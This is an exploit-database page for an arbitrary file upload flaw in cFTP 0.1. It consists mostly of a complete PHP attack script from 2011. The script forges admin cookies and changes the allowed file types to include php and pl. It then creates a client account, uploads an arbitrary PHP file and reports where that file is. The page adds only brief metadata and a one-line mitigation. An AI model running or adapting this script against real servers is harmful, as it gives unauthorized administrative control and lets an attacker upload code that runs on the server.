Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
cFTP - exploit.company
header-logo
Suggest Exploit
vendor:
cFTP
by:
leviathan
7.5
CVSS
HIGH
Arbitrary File Upload
CWE
Product Name: cFTP
Affected Version From: 0.1
Affected Version To: 0.1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Linux
2011

cFTP <= 0.1 (r80) Arbitrary File Upload

This vulnerability allows an attacker to upload arbitrary files to the server.

Mitigation:

Upgrade to a patched version of the software.
Source

Exploit-DB raw data:

<?php
# Exploit Title: cFTP <= 0.1 (r80) Arbitrary File Upload
# Date: 2011-07-29
# Author: leviathan (vulnerability discovered by Simon Leblanc : <https://code.google.com/p/clients-oriented-ftp/issues/detail?id=78>)
# Software Link: https://code.google.com/p/clients-oriented-ftp/downloads/list
# Version: 0.1
# Tested on: linux

// Vulnerable URL
$url = 'http://[url domain]/cFTP/';

// The file to upload
$filename = dirname(__FILE__).'/info.php';


$failext = array('php', 'pl');
$username = 'hackname'.rand(0, 999999);
$cookies_injection = 'access=admin; userlevel=9'; // <-- the big error of this app :-)

/**
 * Call URL
 */
function curl_call_url($url, $cookies_injection, $inputs = null)
{
  $curl = curl_init();
  
  curl_setopt($curl, CURLOPT_URL, $url);
  curl_setopt($curl, CURLOPT_HEADER, false);
  curl_setopt($curl, CURLOPT_POST, true);
  curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
  curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
  curl_setopt($curl, CURLOPT_COOKIE, $cookies_injection);
  
  if (is_array($inputs) === true) {
    curl_setopt($curl, CURLOPT_POSTFIELDS, $inputs);
  }
  
  $response = curl_exec($curl);
  $headers = curl_getinfo($curl);
  $error_number   = curl_errno($curl);
  $error_message  = curl_error($curl);
  
  curl_close($curl);
  
  return array($response, $headers, $error_number, $error_message);
}

// Add vulnerable extensions (php, pl : defined in $failext)
list($response, $headers, $error_number, $error_message) = curl_call_url($url.'options.php', $cookies_injection);

if (preg_match_all('/<input([^>]+)name="([^"]+)"([^>]+)value="([^"]+)([^>]*)>/', $response, $matches)) {
  $input = array();
  $count = count($matches[0]);
  for ($i = 0; $i < $count; $i++) {
    $input[$matches[2][$i]] = $matches[4][$i];
    if ($matches[2][$i] === 'allowed_file_types') {
      foreach ($failext as $ext) {
        if (strpos($matches[4][$i], $ext) === false) {
          $input[$matches[2][$i]] .= ','.$ext;
        }
      }
      $input[$matches[2][$i]] = str_replace(',', '|', $input[$matches[2][$i]]);
    }
  }
  
  // add select
  if (preg_match('/<option selected="selected" value="([^"]+)"/', $response, $matches)) {
    $input['timezone'] = $matches[1];
  } else {
    $input['timezone'] = 'America/Argentina/Buenos_Aires';
  }
  
  // Validate the form to add the vulnerables extensions
  list($response, $headers, $error_number, $error_message) = curl_call_url($url.'options.php', $cookies_injection, $input);
  
  if (strpos($response, 'message_ok') !== false) {
    // Add new client : required to upload the file
    $input = array(
      'add_client_form_name' => $username,
      'add_client_form_user' => $username,
      'add_client_form_pass' => 'hackname',
      'add_client_form_pass2' => 'hackname',
      'add_client_form_address' => 'my address',
      'add_client_form_phone' => '000-000-000',
      //'add_client_form_notify' => '0',
      'add_client_form_email' => $username.'@example.com',
      'add_client_form_intcont' => '',
      'Submit' => 'Create account',
    );
    
    list($response, $headers, $error_number, $error_message) = curl_call_url($url.'clientform.php', $cookies_injection, $input);
    
    if (strpos($response, 'message_ok') !== false) {
      // Now upload file :-)
      $input = array(
        'name' => 'my_hack_file',
        'description' => 'It\'s my hack file',
        'clientname' => $username,
        'ufile' => '@'.$filename,
        'Submit' => 'Upload',
      );
      
      list($response, $headers, $error_number, $error_message) = curl_call_url($url.'fileupload.php', $cookies_injection, $input);
      
      if (preg_match('#<a href="([^"]+)">File uploaded correctly#', $response, $matches)) {
        // get filename
        list($response, $headers, $error_number, $error_message) = curl_call_url($url.$matches[1], $cookies_injection);
        
        if (preg_match('#<a href="([^"]+)'.basename($filename).'" target="_blank"#', $response, $matches_end)) {
          echo 'Your file is here : '.$url.$matches[1].$matches_end[1].basename($filename);
        } else {
          var_dump($response);
          echo 'fail to hack : where is the file !!!';
        }
      } else {
        var_dump($response);
        echo 'fail to hack : file not uploaded';
      }
    } else {
      var_dump($response);
      echo 'fail to hack : client not created';
    }
    
  } else {
    var_dump($response);
    echo 'fail to hack : options not changed';
  }
  
} else {
  var_dump($response);
  echo 'fail to hack : no input';
}

Navigation

Suggest Exploit

Services By CQR